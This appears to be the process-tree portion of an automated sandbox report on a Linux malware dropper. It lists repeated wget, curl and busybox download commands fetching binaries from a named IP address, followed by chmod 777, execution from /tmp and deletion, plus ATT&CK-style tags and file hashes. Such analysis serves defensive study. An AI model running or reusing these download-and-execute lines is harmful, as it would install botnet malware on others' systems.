/usr/bin/wgetwget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:930
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:932
-
-
/bin/chmodchmod 777 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20./1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:935
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:936
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll./13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:940
-
-
/bin/rmrm 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:941
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:942
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:944
-
-
/bin/chmodchmod 777 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB./0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:947
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:948
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:950
-
-
/bin/chmodchmod 777 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE./Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:953
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:954
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:956
-
-
/bin/chmodchmod 777 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd./EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:959
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:960
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:962
-
-
/bin/chmodchmod 777 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi./NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:965
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:966
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:968
-
-
/bin/chmodchmod 777 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA./v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:971
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:972
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:974
-
-
/bin/chmodchmod 777 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz./xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:977
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:978
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:980
-
-
/bin/chmodchmod 777 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU./MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:983
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:984
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:986
-
-
/bin/chmodchmod 777 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1./QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:989
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97